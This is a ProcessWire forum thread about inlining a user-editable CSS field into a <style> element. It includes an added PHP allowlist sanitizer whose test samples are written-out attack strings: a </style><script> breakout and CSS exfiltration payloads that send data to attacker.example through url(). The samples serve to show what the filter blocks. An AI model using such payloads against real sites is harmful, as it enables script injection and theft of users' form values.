security for including php file with str_replace


jploch

Hey there,

so I'm working on this module which adds CSS grid drag and drop functionality to a PageTableExtended-like field, and I wonder if the following working approach would cause security issues?

I save the positions and dimensions of the PageTable items in one text field (named style) on the page in CSS syntax (it's also easy to save CSS for different responsive sizes this way using my JS code).

Now I created a file for my CSS called style.php:

<?php
namespace ProcessWire;
// In the admin the page var needs to be set from the id of the page being edited
if($isAdmin = $this->page->rootParent->id == 2) {
    $page = $this->pages->get((int) wire('input')->get('id'));
}
?>

<style id='pgrid-style'>
    <?php echo $page->style ?>
</style>

This is how I include that file in my module for the backend:

$this->addHookAfter('Page::render', function($event) {
    $page = $event->object;
    $value = $event->return; // rendered content
    $p = $this->pages->get((int) wire('input')->get('id')); // page being edited

    // include style if page has style field
    if ($page->process == 'ProcessPageEdit' && count($p->pgrid_style_desktop)) {
        $dir = dirname(__FILE__);
        ob_start();
        include("$dir/css/style.php");
        $contents = ob_get_contents();
        ob_end_clean();

        $event->return = str_replace("</head>", "\n\t{$contents}</head>", $value); // return all changes
    }
});

On the frontend, in the head of the main template:

<!--  module css-->
  <?php include($config->paths->site ."modules/PageTableExtendedGrid/css/style.php");?>



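The part of the question that matters for security is not the include path or the str_replace, it is that style.php echoes the field verbatim between <style> tags. The browser does not decode entities inside <style>, so entity-encoding the value would break the CSS, and anyone who can write that field controls CSS in the admin page of every user who edits it; a "</style>" in the value ends the element, and url() inside attribute selectors can leak form values. The following is an added example, not code from the thread or from the module: it allowlists what grid CSS needs and refuses the rest. The field name "style" and the "pgrid" selector prefix come from the thread; the character set and the sample inputs are assumptions.

```php
<?php
namespace ProcessWire;

/**
 * Added example, not the module's own code. Returns $css unchanged if it is
 * safe to inline into a <style> element, otherwise '' with $reason set.
 */
function pgridSafeCss(string $css, ?string &$reason = null): string
{
    // Grid placement never needs to load resources or run code, so refuse
    // url() (CSS exfiltration via attribute selectors), @import of remote
    // sheets, legacy expression() and javascript: outright.
    if (preg_match('/(url\s*\(|@import|expression\s*\(|javascript:)/i', $css)) {
        $reason = 'contains url(), @import, expression() or javascript:';
        return '';
    }

    // Allowlist (assumed to cover what the drag-and-drop JS writes): selectors,
    // declarations, media queries, numbers and units. Excluding "<" means the
    // HTML parser can never see "</style>" or a tag; excluding "\" means CSS
    // escapes like "\75rl(" cannot spell url() past the check above; excluding
    // quotes, "[", "]" and "=" removes attribute selectors entirely.
    if (!preg_match('/^[A-Za-z0-9#.\-_:;,{}()%\/\s@>*+!]*$/', $css)) {
        $reason = 'contains characters outside the grid-CSS allowlist';
        return '';
    }

    return $css;
}

/**
 * Drop-in replacement for the raw "<?php echo $page->style ?>" in style.php:
 * emits the <style> element only when the value passes pgridSafeCss().
 */
function pgridStyleTag(string $css): string
{
    $reason = null;
    $safe = pgridSafeCss($css, $reason);
    if ($safe === '') {
        return $reason === null
            ? "<!-- pgrid style: nothing to inline -->"
            : "<!-- pgrid style skipped: $reason -->";
    }
    return "<style id='pgrid-style'>\n$safe\n</style>";
}

// Constructed sample field values (not taken from the thread).
$samples = [
    'ok'       => "#pgrid-1042 { grid-column: 2 / span 3; grid-row: 1; }\n"
                . "@media (max-width: 768px) { #pgrid-1042 { grid-column: 1 / -1; } }",
    'breakout' => "#pgrid-1042 { grid-column: 1; }</style><script>alert(1)</script><style>",
    'exfil'    => "input[name=email][value^='a'] { background: url(https://attacker.example/?v=a); }",
    'escaped'  => "#pgrid-1042 { background: \\75rl(https://attacker.example/); }",
];

foreach ($samples as $label => $css) {
    echo "== $label ==\n" . pgridStyleTag($css) . "\n\n";
}
```

Run with `php style-check.php`: only the "ok" sample is wrapped in the <style> element; the other three are replaced by an HTML comment naming the reason. Whatever validation you settle on, it belongs in style.php itself so the frontend include and the admin hook share it, and it does not change who can write the field: that is decided by the field's and page's edit permissions.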
Hi,

for better readability and more stability in edge cases, I would use the $config->paths->get("NameOfMyModule") syntax to get the exact matching path to your module's root directory. This works even if someone, for example, dropped in the module from a zip from GitHub and the directory name became something different like "NameOfMyModule-master". I would only use this in front and back end.

$includeFilename = $config->paths->get("NameOfMyModule") . 'css/style.php';

